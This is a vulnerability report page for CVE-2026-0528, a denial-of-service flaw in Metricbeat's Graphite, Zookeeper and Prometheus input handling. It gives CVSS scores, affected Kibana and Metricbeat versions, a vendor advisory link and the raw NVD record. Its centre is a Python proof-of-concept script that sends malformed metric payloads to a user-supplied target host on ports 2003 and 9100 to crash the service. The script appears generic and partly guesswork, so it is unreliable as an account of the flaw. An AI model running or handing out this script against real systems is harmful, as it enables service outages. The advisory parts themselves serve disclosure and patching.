Security Vulnerability Report
CVE-2026-0528 CVSS 6.5 MEDIUM

CVE-2026-0528

Published: 2026-01-13 21:15:51
Last Modified: 2026-01-22 19:57:30

Description

Improper Validation of Array Index (CWE-129) exists in Metricbeat that can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed payloads sent to the Graphite server metricset or Zookeeper server metricset. Additionally, Improper Input Validation (CWE-20) exists in the Prometheus helper module that can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed metric data.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (>= 7.0.0, < 7.17.29) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (>= 8.0.0, < 8.19.10) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (>= 9.0.0, < 9.1.10) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (>= 9.2.0, < 9.2.4) - VULNERABLE
Metricbeat 8.x < 8.19.10
Metricbeat 9.x < 9.1.10
Metricbeat 9.x < 9.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-0528 PoC - Metricbeat Graphite metricset DoS
Note: This PoC is for educational and security testing purposes only.
"""
import socket
import struct
import time


def send_malformed_graphite_payload(host, port=2003):
    """
    Send malformed Graphite metric data to trigger array index validation issue
    """
    # Malformed payloads that may cause parsing issues
    payloads = [
        # Payload 1: Invalid metric name with null bytes
        b'\x00metric.test 1.0 ' + str(int(time.time())).encode() + b'\n',
        # Payload 2: Extremely long metric name
        b'a' * 10000 + b'.test 1.0 ' + str(int(time.time())).encode() + b'\n',
        # Payload 3: Malformed value
        b'metric.test \x80\xff\xfe ' + str(int(time.time())).encode() + b'\n',
        # Payload 4: Invalid timestamp
        b'metric.test 1.0 -99999999999999999999999999999999999999\n',
        # Payload 5: Format string like characters
        b'%s%s%s.test 1.0 ' + str(int(time.time())).encode() + b'\n',
    ]
    for i, payload in enumerate(payloads):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((host, port))
            sock.send(payload)
            print(f"[+] Payload {i+1} sent to {host}:{port}")
            sock.close()
            time.sleep(0.5)
        except Exception as e:
            print(f"[-] Error sending payload {i+1}: {e}")


def send_malformed_prometheus_metrics(host, port=9100):
    """
    Send malformed Prometheus format metrics to trigger input validation issue
    """
    malicious_metrics = [
        # Metric with control characters
        b'metric_name\x00{test} 1.0\n',
        # Metric with invalid UTF-8 sequence
        b'metric_test \xc0\x80 1234567890\n',
        # Metric with excessive label count
        b'metric_test{' + b'a='*1000 + b'b="value"} 1.0\n',
        # Metric with very long value
        b'metric_test ' + b'9' * 100000 + b'\n',
    ]
    for i, metric in enumerate(malicious_metrics):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((host, port))
            sock.send(b'POST /metrics HTTP/1.1\r\n')
            sock.send(b'Host: ' + host.encode() + b'\r\n')
            sock.send(b'Content-Type: text/plain\r\n')
            sock.send(b'Content-Length: ' + str(len(metric)).encode() + b'\r\n')
            sock.send(b'\r\n')
            sock.send(metric)
            print(f"[+] Prometheus payload {i+1} sent")
            sock.close()
            time.sleep(0.5)
        except Exception as e:
            print(f"[-] Error sending Prometheus payload {i+1}: {e}")


if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_host>")
        print(f"Example: python3 {sys.argv[0]} 192.168.1.100")
        sys.exit(1)
    target = sys.argv[1]
    print(f"[*] Starting CVE-2026-0528 PoC against {target}")
    send_malformed_graphite_payload(target, 2003)
    send_malformed_prometheus_metrics(target, 9100)
    print("[*] PoC execution completed")

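References

https://discuss.elastic.co/t/metricbeat-8-19-10-9-1-10-9-2-4-security-update-esa-2026-01/384519 (Vendor Advisory)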

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0528", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:50.647", "lastModified": "2026-01-22T19:57:29.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Validation of Array Index (CWE-129) exists in Metricbeat can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed payloads sent to the Graphite server metricset or Zookeeper server metricset. Additionally, Improper Input Validation (CWE-20) exists in the Prometheus helper module that can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed metric data."}, {"lang": "es", "value": "La Validación Incorrecta de Índice de Array (CWE-129) existe en Metricbeat y puede permitir a un atacante causar una denegación de servicio a través de la Manipulación de Datos de Entrada (CAPEC-153) mediante cargas útiles malformadas y especialmente diseñadas enviadas al metricset del servidor Graphite o al metricset del servidor Zookeeper. 
Además, la Validación de Entrada Incorrecta (CWE-20) existe en el módulo auxiliar de Prometheus que puede permitir a un atacante causar una denegación de servicio a través de la Manipulación de Datos de Entrada (CAPEC-153) mediante datos de métricas malformados y especialmente diseñados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-129"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.17.29", "matchCriteriaId": "5DE7E670-76C6-4E95-BDD0-9322E42929BB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.10", "matchCriteriaId": "8707CF69-9922-490B-B64F-38F2D31E2CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", 
"versionEndExcluding": "9.1.10", "matchCriteriaId": "FC3281ED-A331-43DC-9705-80A3FA3E6C75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.4", "matchCriteriaId": "8BF9D6AE-B07F-4516-A684-60B02BF731A0"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/metricbeat-8-19-10-9-1-10-9-2-4-security-update-esa-2026-01/384519", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}